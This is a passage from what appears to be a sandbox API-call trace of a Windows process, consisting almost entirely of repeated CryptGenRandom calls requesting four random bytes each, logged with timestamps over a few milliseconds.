pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.917] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.921] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.921] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.921] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.921] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.921] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.921] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.921] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.921] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.921] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.921] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.921] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.921] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.921] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.921] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.921] CryptGenRandom (in: hProv=0x8bf310, 